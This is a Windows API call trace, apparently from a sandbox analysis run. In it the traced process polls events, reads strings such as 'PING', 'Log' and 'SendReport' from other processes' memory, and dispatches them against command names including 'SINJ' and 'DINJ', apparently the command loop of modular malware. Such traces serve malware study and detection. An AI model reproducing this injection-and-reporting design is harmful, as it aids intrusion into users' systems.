	[0224.968] Sleep (dwMilliseconds=0xbb8) 
	[0225.031] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779b58
	[0225.031] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0225.031] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0225.031] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0225.031] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2779b58) returned 1
	[0225.031] Sleep (dwMilliseconds=0xbb8) 
	[0225.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779b58
	[0225.047] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0225.047] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0225.047] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0225.047] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2779b58) returned 1
	[0225.047] Sleep (dwMilliseconds=0xbb8) 
	[0225.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779f90
	[0225.062] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0225.062] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0225.062] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0225.062] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2779f90) returned 1
	[0225.062] Sleep (dwMilliseconds=0xbb8) 
	[0225.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a440
	[0225.078] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0225.078] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0225.078] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0225.078] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277a440) returned 1
	[0225.078] Sleep (dwMilliseconds=0xbb8) 
	[0225.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a8a0
	[0225.093] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0225.093] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0225.093] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0225.093] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277a8a0) returned 1
	[0225.093] Sleep (dwMilliseconds=0xbb8) 
	[0225.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a8a0
	[0225.109] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0225.109] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0225.109] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0225.109] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277a8a0) returned 1
	[0225.109] Sleep (dwMilliseconds=0xbb8) 
	[0225.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a8a0
	[0225.124] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0225.124] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0225.124] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0225.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277a8a0) returned 1
	[0225.124] Sleep (dwMilliseconds=0xbb8) 
	[0225.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277acd8
	[0225.140] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0225.140] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0225.140] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0225.140] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277acd8) returned 1
	[0225.140] Sleep (dwMilliseconds=0xbb8) 
	[0225.156] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b110
	[0225.156] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0225.156] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0225.156] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0225.156] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277b110) returned 1
	[0225.156] Sleep (dwMilliseconds=0xbb8) 
	[0228.401] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0228.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b88
	[0228.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x24d5b0
	[0228.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225da8
	[0228.401] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0228.401] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225b88, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b88*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0228.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0228.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75d8
	[0228.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x22b75d8, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0228.401] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x24d5b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x24d5b0, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0228.401] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225da8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225da8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0228.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225da8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0228.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778708
	[0228.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225da8, cbMultiByte=-1, lpWideCharStr=0x2778708, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0228.401] SetEvent (hEvent=0x474) returned 1
	[0228.401] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b88) returned 1
	[0228.402] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d5b0) returned 1
	[0228.402] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225da8) returned 1
	[0228.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778758
	[0228.402] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0228.402] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0228.402] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0228.402] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0228.402] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0228.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75f0
	[0228.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2778780, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xa10) returned 0x554
	[0228.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27787d0
	[0228.402] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.402] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.402] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x102
	[0228.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225da8
	[0228.403] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x24d5b0
	[0228.403] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b88
	[0228.403] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0228.403] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000415c, lpBuffer=0x225da8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225da8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0228.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225da8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4
	[0228.403] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7680
	[0228.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225da8, cbMultiByte=-1, lpWideCharStr=0x22b7680, cchWideChar=4 | out: lpWideCharStr="Log") returned 4
	[0228.403] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x7af980, lpBuffer=0x24d5b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x24d5b0*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0228.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x24d5b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27
	[0228.403] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c71a0
	[0228.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x24d5b0, cbMultiByte=-1, lpWideCharStr=0x22c71a0, cchWideChar=27 | out: lpWideCharStr="Mismatch parameters count!") returned 27
	[0228.403] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x100049e8, lpBuffer=0x225b88, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b88*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0228.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0228.403] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0228.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x2778640, cchWideChar=11 | out: lpWideCharStr="SendReport") returned 11
	[0228.403] SetEvent (hEvent=0x55c) returned 1
	[0228.403] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225da8) returned 1
	[0228.403] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d5b0) returned 1
	[0228.403] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b88) returned 1
	[0228.403] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7698
	[0228.404] lstrcmpiW (lpString1="Log", lpString2="ModuleQuery") returned -1
	[0228.404] lstrcmpiW (lpString1="Log", lpString2="WantRelease") returned -1
	[0228.404] lstrcmpiW (lpString1="Log", lpString2="VERS") returned -1
	[0228.404] lstrcmpiW (lpString1="Log", lpString2="SINJ") returned -1
	[0228.404] lstrcmpiW (lpString1="Log", lpString2="DINJ") returned 1
	[0228.404] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7668
	[0228.404] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27787d0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd44) returned 0x604
	[0228.404] Sleep (dwMilliseconds=0xbb8) 
	[0228.436] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.436] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.436] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.436] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x102
	[0228.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225da8
	[0228.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x24d5b0
	[0228.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2259f0
	[0228.436] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0228.436] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000415c, lpBuffer=0x225da8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225da8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0228.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225da8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4
	[0228.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7500
	[0228.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225da8, cbMultiByte=-1, lpWideCharStr=0x22b7500, cchWideChar=4 | out: lpWideCharStr="Log") returned 4
	[0228.436] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x100049f4, lpBuffer=0x24d5b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x24d5b0*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0228.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x24d5b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25
	[0228.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7470
	[0228.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x24d5b0, cbMultiByte=-1, lpWideCharStr=0x22c7470, cchWideChar=25 | out: lpWideCharStr="Report successfully sent") returned 25
	[0228.437] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x100049e8, lpBuffer=0x2259f0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2259f0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0228.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0228.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778410
	[0228.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x2778410, cchWideChar=11 | out: lpWideCharStr="SendReport") returned 11
	[0228.437] SetEvent (hEvent=0x55c) returned 1
	[0228.439] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225da8) returned 1
	[0228.439] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d5b0) returned 1
	[0228.439] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2259f0) returned 1
	[0228.439] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7548
	[0228.439] lstrcmpiW (lpString1="Log", lpString2="ModuleQuery") returned -1
	[0228.439] lstrcmpiW (lpString1="Log", lpString2="WantRelease") returned -1
	[0228.439] lstrcmpiW (lpString1="Log", lpString2="VERS") returned -1
	[0228.439] lstrcmpiW (lpString1="Log", lpString2="SINJ") returned -1
	[0228.439] lstrcmpiW (lpString1="Log", lpString2="DINJ") returned 1
	[0228.439] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7560
	[0228.439] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27783e8, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd48) returned 0x5c4
	[0228.440] Sleep (dwMilliseconds=0xbb8) 
	[0228.447] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.447] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.447] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.447] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.447] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c900) returned 1
	[0228.447] Sleep (dwMilliseconds=0xbb8) 
	[0228.463] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.463] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.463] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.463] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.463] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c900) returned 1
	[0228.463] Sleep (dwMilliseconds=0xbb8) 
	[0228.479] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.479] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.479] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.479] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.479] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c900) returned 1
	[0228.479] Sleep (dwMilliseconds=0xbb8) 
	[0228.494] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.494] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.494] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.494] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.495] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c900) returned 1
	[0228.495] Sleep (dwMilliseconds=0xbb8) 
	[0228.510] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.510] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.510] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.510] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.510] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c900) returned 1
	[0228.511] Sleep (dwMilliseconds=0xbb8) 
	[0228.525] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.526] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.526] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.526] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.526] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c900) returned 1
	[0228.526] Sleep (dwMilliseconds=0xbb8) 
	[0228.651] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.657] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.657] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.657] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.657] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c900) returned 1
	[0228.657] Sleep (dwMilliseconds=0xbb8) 
	[0228.666] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.666] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.666] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.666] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.666] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c900) returned 1
	[0228.666] Sleep (dwMilliseconds=0xbb8) 
	[0228.681] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.681] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.681] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.681] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.681] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778c80) returned 1
	[0228.681] Sleep (dwMilliseconds=0xbb8) 
	[0228.697] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.697] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.697] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.697] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.697] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778c80) returned 1
	[0228.697] Sleep (dwMilliseconds=0xbb8) 
	[0228.720] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.857] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.857] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.857] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.857] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778c80) returned 1
	[0228.857] Sleep (dwMilliseconds=0xbb8) 
	[0228.868] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.868] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.868] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.868] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.868] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778c80) returned 1
	[0228.868] Sleep (dwMilliseconds=0xbb8) 
	[0228.885] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.885] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.885] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.885] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.885] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778c80) returned 1
	[0228.885] Sleep (dwMilliseconds=0xbb8) 
	[0228.899] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0228.899] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0228.899] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0228.899] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0228.900] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778398) returned 1
	[0228.900] Sleep (dwMilliseconds=0xbb8) 
	[0228.919] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.203] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.266] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.266] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.266] Sleep (dwMilliseconds=0xbb8) 
	[0229.274] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.274] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.274] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.274] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.274] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.274] Sleep (dwMilliseconds=0xbb8) 
	[0229.289] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.289] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.289] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.289] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.289] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.290] Sleep (dwMilliseconds=0xbb8) 
	[0229.305] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.305] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.305] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.305] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.305] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.306] Sleep (dwMilliseconds=0xbb8) 
	[0229.323] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.323] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.323] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.323] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.323] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.323] Sleep (dwMilliseconds=0xbb8) 
	[0229.337] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.337] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.337] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.337] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.337] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.337] Sleep (dwMilliseconds=0xbb8) 
	[0229.352] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.352] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
